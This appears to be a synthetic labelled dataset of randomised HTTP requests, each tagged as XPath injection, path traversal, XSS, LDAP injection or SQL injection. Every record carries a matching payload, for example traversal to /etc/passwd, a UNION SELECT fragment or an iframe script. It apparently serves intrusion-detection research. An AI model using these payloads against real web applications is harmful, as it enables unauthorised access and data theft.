GET /jeoriuadyrohfhhejn/rSOnE55roSy4i/ttodloruseeiiorxr8he/jZSMJHYwZscriptb@/frombeO5E1FKWZ2L/8-w9gjtuTcimgUK/ivJU9If.zGyXc7sRB.css?RSconnectetcVV9null7L4=e%3By&aNFW5=+eelboot.inieig&euwt=%25u&hdh=tsoGdtLh&eaxrkoureHdhel=rLbm823&A4Rt7Y9jDlocation5=520614&7vVRmocha8=hSmFxlv-rKaB&r6=6029689&bp=hCHs%27+++or+++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28++++i%2Bj%2B++k++%2B+++l%2B++1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++++%27vyarjb%27+++%3D+++%27+++++peDoqr%27++or&edp6tfhedycc=te&o0fetcl=e&.UEm-9F=8474043&aastt5sdei6iupm=691&irdex=+ HTTP/1.1
Host: www.sTDy.st
Connection: eeou
Accept: text/*, application/*;q=0.4
Accept-Charset: cp-950, windows-1257;q=0.3
Accept-Encoding: compress, deflate;q=0.2
Accept-Language: h2roe-thgmaeg;q=0.6, 6ta5sc8-yymasrfw;q=0.4, aabszohz-uwnmii;q=0.3
Cache-Control: no-transform
Client-ip: 166.142.219.107
Cookie: eanEnt=neagf7Q0|H
Cookie2: $Version="5"
Date: Wed, 18 Mar 09 13:49:31 CET
ETag: W/"7e7u3LM6K0GYc21UDN"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sun, 22 Nov 09 21:54:43 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "e@nrx@bG2IYw9Bqyh"
If-None-Match: "iMpZ9IWn-oEGhQU"
If-Range: Sun, 10 Jul 05 02:03:38 UTC
Max-Forwards: 1311
MIME-Version: 7.6
Pragma: on=uor1op
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Digest nonce
Range: 5920-3
Referer: http://eamisn7a.gov/le8Raf/e2li/ca6eeoo/aoetn4c/e9bteede.asp
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/7.0 (Machintosh; U; Mac OS X 3.3; Nt-up; rv:7.2.5) Gecko/84762751
UA-CPU: MIPS
UA-Disp: 8370,749,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 902 221.77.27.240 "H6v5cts" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 5379207643
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48816
Start - Id: 48317
class: XPathInjection
GET /a1ienzintsmpab9h/d5qSP@cF-cQ8rY.nsf?y0hoteRjo=aG&lcaQA=aotusr%3EticitE&iA08ohTp=8014 HTTP/1.1
Host: 53.180.166.32
Connection: keep-alive
Accept: application/zip;q=0.1, image/gif;q=0.7
Accept-Charset: x-mac-chinesesimp, x-mac-roman;q=0.6, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 224.127.116.55
Cookie: rnmAgahiNra=nY3NTLXa
Cookie2: $Version="3"
Date: Tue, 03 May 05 21:49:28 CET
ETag: W/"8bryrAVeHZlsVcY0"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Sun, 04 Oct 09 19:49:47 GMT
If-Match: "6CicvDGcJuF-ExB_hJ"
If-None-Match: *
If-Range: "AcMPFfFNC64nKHqcI9oi"
Max-Forwards: 2
MIME-Version: 6.0
Pragma: t='ety'
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: ro2Xo ulta=pOrntd6
Referer: /hddsnr/hasleohe/sheyEhw9.cfm
TE: trailers,gzip;q=0.4,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: au']   |  P    |     //user[   name/text(  ) =   't3il
UA-Disp: 296,6544,16
UA-Color: color32
UA-Pixels: 433x249
Via: 0.5 www.onileto.jpg, pmwshi/7.2 21.94.135.100:329, 6.9 www.rdtwirs.html
Transfer-Encoding: uthgao
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48317
Start - Id: 44814
class: PathTransversal
GET /ztx6JseeGaiG/fcrzbiwtmlr/nn.gif?lisyeigenst5=239424626&mtom=m8y&POtdnetcatzGK6E-z=024966979&PCIc0=98152748&sa=41314&hs5noeddrdT=ael&elhgakanesett=7&iVtU8k_uwp-W=9rtt&spEdvhde=imghdkaadminFo&Lsr=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&it7nabod=3870&Tew8zLoei6ony=Omgdsad&ogntt=fherbrelOl&glemsnsheaac=64763 HTTP/1.1
Host: 223.9.210.58
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 253.244.117.170
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="8"
Date: Thu, 01 Apr 04 19:18:26 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sat, 06 Mar 10 02:36:46 UTC
If-Unmodified-Since: Sat, 07 Mar 09 19:07:23 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: "SyLx5SuV.qv2Te8s0"
If-Range: Fri, 16 Feb 07 12:23:00 CET
Max-Forwards: 189
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: Digest nc=233d0BC0
Range: 60-,-5700
Referer: http://femhm.gov/shao/wite8st/p2Icd/Tauno/UxEanhb.exe
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.7 (Windows; U; Win98 7.2; r2-St; rv:2.8.8) Gecko/45600184
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: 0.9 www.6hohEnr.tiff, 7.1 134.138.220.239
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 40759970154914
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44814
Start - Id: 47505
class: XSS
GET /s@/ttSeEeiaHessIbiqrmin/atiid2eamdtgd2a2tpaX/_NjJbody9_bHNpw/W8yDKSG/fCsswmmrhors0etItE/MVe_Qs.bin?oEgDUuc08rcp=%3Ciframe++src+%3D+++%22+++++vbscript%3A%5Balert++%28%27nlzolrt%27%29%3B%5D%22%3E&LTSn.bQd1CwS=rzTwgEz.Kn&ozSPqnc3.=Asnlc&eBwjadttpezr=Wsigar1&bwu3=%404ohbin&8anQitOa=028&D4SQx=3iauepsystempoa&mtadnosi2=mss%7Ciohecho5%26t&KSoaeiyoevjdgu=ir%5C HTTP/1.0
Host: 238.63.96.148
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9
Accept-Language: *
Cache-Control: min-fresh=5561
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="6"
Date: Wed, 16 Aug 06 24:00:16 CET
ETag: W/"mH_4FRfD3DPEqxMbE"
Expect: narz
From: oEh7ee@n2lwamdun.biz
If-Modified-Since: Tue, 13 Dec 05 24:09:39 CET
If-Unmodified-Since: Wed, 24 Mar 10 10:41:48 GMT
If-Match: "pxzhtupDUMhpB55zD"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Tue, 13 Nov 07 05:47:52 UTC
Max-Forwards: 6791
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic ZWdycjplaU9lMQ==
Range: -582231
Referer: http://www.eKbla.it/aadU.rar
TE: chunked;q=0.9,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.6 (Windows; U; WinNT 6.1; ir-tl; rv:0.0.7) Gecko/55869806
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: FTP/3.4 www.sroerS8s.tiff
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.6.45.49
X-Serial-Number: 870651819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47505
Start - Id: 49119
class: XPathInjection
GET /nam/eCzfxTJK/swBLjpyZb7i4O1l/ut3iltCdbeps/ugaha/sJm-h94Pj/-dvarjwhereM.Cd/tW7sa56@Ew96g/e4dTlteatie19xcauaWt.asmx?tlooeemwapta=2%5Dmo&etw64depodrSnri=42409&lueSkdagKlih=h8%27++or+++++1%3C+++++iferne%2Frne%2Fw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D22%5D++++or+++%27im%27++%3D+%27&iatlTlTmris=m0_&lnNsn8tepEBeogW=+v+roptaa8inIs4&ttcey=Eu&ibeahcnd=eehch%7ClsuGxg&rkektCba4=t7osj%27N%2Fi&5ac=winieOegwoLt5ieren&lpeoTnsadq=ntrninh9nsjuotS5&jry3i8nt4itR=el&NrreeuaEmsNe=698 HTTP/1.1
Host: www.ioIaref.cz
Connection: keep-alive
Accept: image/jpeg, audio/*, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: min-fresh=84
Client-ip: 140.0.134.125
Cookie: sUjevalAgehbetweenL=45;Oey=2h0
Cookie2: $Version="259"
Date: Fri, 15 Jul 05 12:00:41 CET
ETag: "vPp0o9iOZjK@583"
Expect: htduh=nedueein;lnyke
From: tiaecs@atrtrnsru.ch
If-Modified-Since: Sun, 22 Jul 07 01:17:13 GMT
If-Unmodified-Since: Sat, 02 Apr 05 16:06:36 UTC
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: "Zh@aEsWWy7n@MfvHPIZ"
If-Range: "6IbXyIqqMh60@BPT"
Max-Forwards: 2585
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: bsj9 yaSet=s6ca
Authorization: Basic bjduYWlldWo6ZWhyOWxzZA==
Range: 1-
Referer: /iDaGgLjc.mdb
TE: chunked;q=0.3,trailers,deflate;q=0.5
Trailer: Referer
User-Agent: eRwWao/3.2.9.7.2
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: rlace/3.0, hoSa/9.4, jas/6.6, iAeed/2.7
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 15.3.39.191
X-Serial-Number: 68685203672775561
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49119
Start - Id: 36101
class: PathTransversal
GET /av.T/apsDFechoPRR/h91zWEFjLVbuBs/aefm4nw/reV@/dda0csmentedsolbniaa/s3dto7xYxi0NUivs/wInl.png?aeThdeta=nsie1s&k0y=znteaatGr+i&3e=245&EjaV=n%3A%5Cautoexec.bat&rtr3ert=9011&tzUuuhohn=43588453&geibdi=lrea6execps&UwFLq4kK=nieipie&it1lc=smccHmumw&ebn=tseot6tsxe%29n&dco=qta%2Be&crawDbEe0oye=338693369 HTTP/1.0
Host: www.sshtbmu.gov
Connection: istbg
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: mi-htecc6g;q=0.2, ey-eoeleo;q=0.2
Cache-Control: max-stale
Client-ip: 100.85.62.104
Cookie: ahadotoetee=0060;Ae9aT=hXx3Sc5rAjj;neuoeenieeec=eaeuhtr5a;hpo=gL.RCWJhZ4p6;tesiIhdge=Acgw 
Cookie2: $Version="1"
Date: Wed, 19 Jul 06 10:13:14 CET
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: 100-continue
From: lemgP@orThcs1lso.de
If-Modified-Since: Sat, 28 Jun 08 08:56:47 GMT
If-Unmodified-Since: Sat, 24 Nov 07 01:33:51 UTC
If-Match: "9D4fY42SD-lYq8pqMe"
If-None-Match: "DMex6@y6MjYiwmNwqB"
If-Range: Fri, 26 Oct 07 18:26:55 GMT
Max-Forwards: 864
MIME-Version: 3.5
Pragma: xs=t
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest cnonce="rnKai"
Range: 78-
Referer: http://teN6ybx0.cz/iszbemr/jfowes/fntto44/tnarii.mpeg
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 6.8; gf-hF; rv:0.9.5) Gecko/08116282
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 8256x1298
Via: HTTP/6.5 www.dui2ee.shtml
Transfer-Encoding: deflate
Upgrade: Fd1sk/0.3
Warning: 397 214.252.198.233:945 "AtTaftF9tdtewstae" "Tue, 11 Nov 08 15:03:35 UTC"
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36101
Start - Id: 38781
class: LdapInjection
GET /mfuqeitgir2owoglt/o5owzqnitt3a.aspx?emnsia=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&httpsaLv=hm+icinputa HTTP/1.0
Host: www.eve8Mal.de:80
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: macintosh, x-mac-chinesesimp;q=0.5, iso-8859-7;q=0.5
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.1
Cache-Control: Asb=nhd
Client-ip: 103.114.5.31
Cookie: 7-L0-a=nhw;631lRhA7d9M=Dhbmaaf;adywe=tx-AWyeRz@S;q5ldkdvo3bptl93=2412
Cookie2: $Version="919"
Date: Sun, 27 Jan 08 05:15:52 CET
ETag: W/"veWm4Di8HikI9CrFgJ"
Expect: niBha8=isnno;es0ysfa
From: eedz@idneeachi.org
If-Modified-Since: Wed, 04 Jul 07 10:41:14 UTC
If-Unmodified-Since: Mon, 17 Jan 05 22:33:56 UTC
If-Match: "xh2hiX1iqH@y@g2y0t"
If-None-Match: "9OTL3T-9Sf6cZW_om"
If-Range: "WumTLqIPh_8WEXcrbd"
Max-Forwards: 710
MIME-Version: 3.1
Pragma: veRgcs='nR'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM OGU0b1J0bWd2YXJlZW9lbmlXdVM0YnVvdXRrdzVzenl5bzNsaXBvOA==
Range: 777808-9828,-9730,-076
Referer: /ewocoh/uruscNjn/qebt/iDoetoon.htm
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.2 (X11; U; Linux i386 3.0; nn-on; rv:6.8.3) Gecko/84398021
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: Day/0.5 191.130.216.182
Transfer-Encoding: gzip
Upgrade: uheEfl/5.8, bsp/0.2, slh/3.9, tfor/3.1, iAr/7.5
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 251.245.132.75
X-Serial-Number: 323337935267147
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38781
Start - Id: 50044
class: XPathInjection
PUT /cofjtrag0dOoTytejh/rrAMCoeqHushGxzqf/.SphpMP/eeebeAtdcoreeuses/7idx/nattaydNafs/tiAcm0e2/0ws/odtsstlogae4/3dCje/zYa.nFRpasswd4y.jpg? HTTP/1.1
Content-Length: 184
Content-Language: n,p
Content-Encoding: gzip
Content-Location: http://www.eoyad.fr/taesh/amts/n8ulc.pl
Content-MD5: cmdyeG1jZWVzRXR0a3RpNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 09 Oct 08 10:36:07 GMT
Last-Modified: Fri, 20 Oct 06 18:18:34 UTC
Host: www.arta.st
Connection: 6tdZse
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 233.61.70.142
Cookie: ftaadesDgm=trid;3 o k;ejeizhh=092     or  1<   seocEa/bn/er/child::text()[position()=06] or  32409='] | /* | /foo[bar=';tnQeh0liRhyeRf=eSY@KpkIP;ZdDkv8fkT=hehrlsEq\hP
Cookie2: $Version="0"
Date: Sun, 22 Jul 07 07:44:33 UTC
ETag: "c7vfaaxMQjWmJ79sfOR"
From: hizpE@meYwOri.cz
If-Modified-Since: Fri, 16 Jun 06 06:07:07 CET
If-Unmodified-Since: Wed, 05 Nov 08 15:26:22 CET
If-None-Match: "i3.SH5kFgLObCreQJ"
If-Range: Tue, 21 Nov 06 19:18:48 CET
Max-Forwards: 189
Pragma: res='pio'
Authorization: Digest nonce
Referer: http://Btlk23ee.cz/fqlln/Sdycttos/rlurel/i2mzom6.php3
TE: trailers,chunked,trailers
User-Agent: Mozilla/8.1 (compatible; MSIE 9.4; Linux i386; eraty)
UA-CPU: PowerPC
UA-Color: color32
Via: FTP/0.6 40.88.153.46:4
Transfer-Encoding: gzip
Warning: 838 248.50.212.152 "Eenn" "Sat, 26 Jul 08 23:48:30 GMT"
X-Serial-Number: 723279947580286654
----: ----------------------------------

Edsr7erocetrodo=82864&2d=521118&jacesecdm99Di=656891&T7=925967&rsmecidda4=1192032&bhi7faydndth=x&Yoe4_YRMjZn=nateIoi&hdaeTslete8ie=enacdrg4e&reaqum3=eb &teeGeNzen=eejhe&eyo5islfZo=~8

End - Id: 50044
Start - Id: 45619
class: PathTransversal
GET /Rf7Itr/mG7ENWBXBYa/oDnA9Cosnml/u.x72l/nh4wsoat7te/xnnPesii0nnmt2ahgIts/tigA1tiF7jsfQl3tg9E_/mLcH7XB6hUmUrYXVuT.J/oZ3fTiMvl5yZaY/MPtL36MaK.htm?aWhsTdsIylunct=9132420236&eal=ainput%5C&y7Rtmp4=i5zu&6ottnt0drMLt=hr&tuws89tlmsat=649&arIrcrhgsabam=..........................WINNTsystem.ini&soens=6idaosesmSeoln&T3ff1kJ_=ox8HCDV2%40Mo&7erpetc=aHw3Cj&82reugerWt=934920 HTTP/1.1
Host: 79.130.77.154:4369
Connection: close
Accept: */*
Accept-Charset: iso-2022-jp, cp-932;q=0.3
Accept-Encoding: 
Accept-Language: i-bNn;q=0.7, oqhi-2e7ci
Cache-Control: no-cache
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="41"
Date: Sun, 25 Jun 06 03:20:52 UTC
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 29 Mar 07 04:44:01 CET
If-Match: "mjRrQZvQpIu1AsI.jacY"
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 2756
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic dG9pYjU6bG9Ib213Yw==
Authorization: NTLM aGxhMDhuc3R2cWRsYXNkNGhuZ3pFdDdkandkdGllbnNSRWxmMm1hZWQ=
Range: 942-,71595-5
Referer: /iyen7d.php3
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: seindndaa2seinsgeiR
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 45619
Start - Id: 41302
class: SqlInjection
GET /0Bt/0Llxp_b_lzGUbetweenevalHE./IeRn/_sam8IztAOGpC2jo.asmx?ZW6idNZvKDSxtermW=4763759&goe1T9=eooluvarcoi%3F+ei&97tYsLtes=epT5bi8e%3B%26ldr0&ee=r5egstenl&bOAjdiaglowote=h5c_A&wt=%3E5&norkNyoteais=zoktoso9L3pt0h9&emwk0=kL3&Pn=tSEbWpTO HTTP/1.1
Host: 164.92.250.7
Connection: nAkcl
Accept: video/quicktime, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: uia-suEoyc
Cache-Control: no-store
Client-ip: 163.36.54.41
Cookie: ynr5='UNIONALLSELECTfieldFROMnaatietoarieWHERE''  ='
Cookie2: $Version="6"
Date: Sat, 15 Sep 07 01:26:35 UTC
ETag: "ioXk5QZhkXMxE3VC2G"
Expect: ezgiege
From: syaw2n@lrei.com
If-Modified-Since: Sun, 25 Jul 04 16:51:14 CET
If-Unmodified-Since: Wed, 02 Jun 04 21:11:58 UTC
If-Match: "4r4xJVnR9pZG@fVEywR"
If-None-Match: "okUQTbEI33Ovo7nEhW"
If-Range: *
Max-Forwards: 992
MIME-Version: 1.8
Pragma: ersaeq=w
Proxy-Authorization: Basic NGFyb2liNG46ZGF5b2Q4dw==
Authorization: NTLM ZHNjemxHZGFuOEFhd3phc3NmeXJubm9ydHhldmUwcGQwb2lnc296OWFpMmVtYXFh
Range: -320480,8216-,-941735
Referer: http://www.Eahnao.ch/Insdrasi/leooeat1/uaew/ghizs4o/netefzo.exe
TE: trailers,chunked;q=0.5
Trailer: From
User-Agent: 0rxurdmiac (rA3zeZLHYX; 7uLW1nXGDn; uMuWqt)
UA-CPU: 68000
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 9.5 www.odo7n.html, 1.4 86.147.73.114
Transfer-Encoding: identity
Upgrade: 7i1/7.1, taia/3.3
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 47.84.163.47
X-Serial-Number: 670048221
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41302
Start - Id: 38504
class: LdapInjection
GET /hztEddgl/tVahDulaoe0gcetrae/rVosxFpgRL8cT3ObDlKm/tgo3La0wau/e6WGTsSgs.DuA6XX/ja4zPMrcpyQexec/processing-instructionvbscriptMP27xidX/SVdhttp3Y5Qtm@qmochavU/sRDh9YNfkzO/sA8FOflB.asmx?loptt0Pm@=se&doie4ednchtna=%2Feeua&ritp3weai=%29+%28+++%7C+++%28+cn%3D*o+%27brien*+++%29%28mail++++%3D*o+++%27brien*+%29&WKLT=%5B HTTP/1.1
Host: 130.1.56.30:28836
Connection: soaer
Accept: text/*;q=0.9, text/*;q=0.9, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.3, identity, compress;q=0.3
Accept-Language: eabhot-Bttj, e-pm, eetyc-asyddzll;q=0.9, l-fnptD6h;q=0.0
Cache-Control: only-if-cached
Client-ip: 150.1.113.3
Cookie: mnpatpbrpry19h=1
Cookie2: $Version="33"
Date: Thu, 18 Oct 07 16:33:07 GMT
ETag: "zquZ.85zU@b08iEVA7ZH"
Expect: 100-continue
From: eorT@elrAedmeoy.biz
If-Modified-Since: Mon, 17 Dec 07 05:10:16 UTC
If-Unmodified-Since: Sat, 01 Aug 09 22:38:42 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "NFfENmEb00JDlZZI-cj"
If-Range: *
Max-Forwards: 45
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM YWd0eWlmbThlRWpub3JzY2xkbnhlRXRyZWVqeTJhbjd0MG4=
Range: -087,245-62681,-648438
Referer: http://dyth.net/e9ELue/nnal.jsp
TE: deflate,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 8.4; el-ih; rv:5.9.7) Gecko/11944051
UA-CPU: 68000
UA-Disp: 299,3970,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9397x4761
Via: 5.4 3.197.180.209, FTP/4.3 www.hEr2A1d.tiff
Transfer-Encoding: gzip
Upgrade: na0eT/4.7, vutbvf/7.1
Warning: 217 201.65.24.14 "trTmQnnra" "Fri, 16 Apr 04 06:13:32 CET"
X-Forwarded-For: 226.59.112.50
X-Serial-Number: 66891
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38504
Start - Id: 48539
class: XPathInjection
POST /ue8eraorehfxyhe/ia/r3SYylP.b-HoSiV0/89xdtvKxQmd3pWYT/scrotoahiah46e/QWi/so.Y_bwbZ/uTCe@E27Ro.KNO_/teu0/7Wdi.css? HTTP/1.1
Content-Length: 276
Content-Language: aseb5,d9e
Content-Encoding: compress
Content-Location: /jpran/pan1od.swf
Content-MD5: aDNiczFkU29mcmVuZWVwZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Apr 09 08:11:59 UTC
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: www.evvwodu.de:09142
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-roman;q=0.6
Accept-Encoding: gzip;q=0.5, compress, gzip;q=0.7
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="80"
Date: Sat, 30 Dec 06 23:43:39 GMT
ETag: "GcXnmUBFxWJV.V3_q"
Expect: ulHtWen3
From: l7hgtc@eorr.be
If-Modified-Since: Thu, 12 May 05 09:13:39 CET
If-Unmodified-Since: Wed, 04 Apr 07 19:11:19 CET
If-Match: *
If-None-Match: "UP1Ir5HsSq7x3YVl@X"
If-Range: "fx6n5Sfvf-ttZzmo"
Max-Forwards: 5450
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: NTLM cmVybnJuc3RkaWE2UGhzZ2llU3VoaG9sZWVhNmF1dWF0amc3b29uUmhlbmV0dTc=
Range: 8664-
Referer: http://www.saujln.net/aoct/4ceiEl/1adtU.htm
TE: deflate;q=0.8,trailers,deflate;q=0.6
Trailer: Expect
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 2.8; be-tb; rv:8.7.8) Gecko/45818399
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 429x1759
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: gzip
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lsg7tlwtie1d=cl&Vu5P5X_k0=tucT' or    count(    path/child::node()[position(   )=((i+  j   + k+    l   +   1)]   |     path/child::*()[position()=(k+1)])=1   or    'fp'    =  '    uBaaruet'     or

End - Id: 48539
Start - Id: 46276
class: PathTransversal
GET /bj/cxJn4lPutM4tfoV0k/lmraannS.mdb?trh=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&torhcheunruou=30050380 HTTP/1.1
Host: www.teqixnR.com
Connection: reawi4v
Accept: */*
Accept-Charset: x-mac-arabic;q=0.0
Accept-Encoding: compress, gzip, deflate
Accept-Language: *;q=0.7
Cache-Control: min-fresh=8154
Client-ip: 131.126.28.0
Cookie: aa35awmAuf1hpsi=lTeiif6+e;ttirm=wbiuetlocationEtty ;yeeeao3tkhgio=g5qz;jsddctn=e%r5t%ciaE2fHt>ohu>u
Cookie2: $Version="92"
Date: Fri, 27 Feb 04 04:49:32 GMT
ETag: W/"HnKH5rAh5ToK.q6tEPiQ"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Fri, 08 Oct 04 16:47:00 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: *
If-None-Match: "54kfeWJLFiYYWtUP2f"
If-Range: Wed, 06 Jun 07 12:10:01 UTC
Max-Forwards: 756
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM dHRqZWRFSzNkcmF0Y2ltNXR0YW10ZzhmbHpuNWRuZGFJc2hlaQ==
Authorization: Basic ZW5uaWV6eGM6YW9oMG5reA==
Range: -99,17-4389
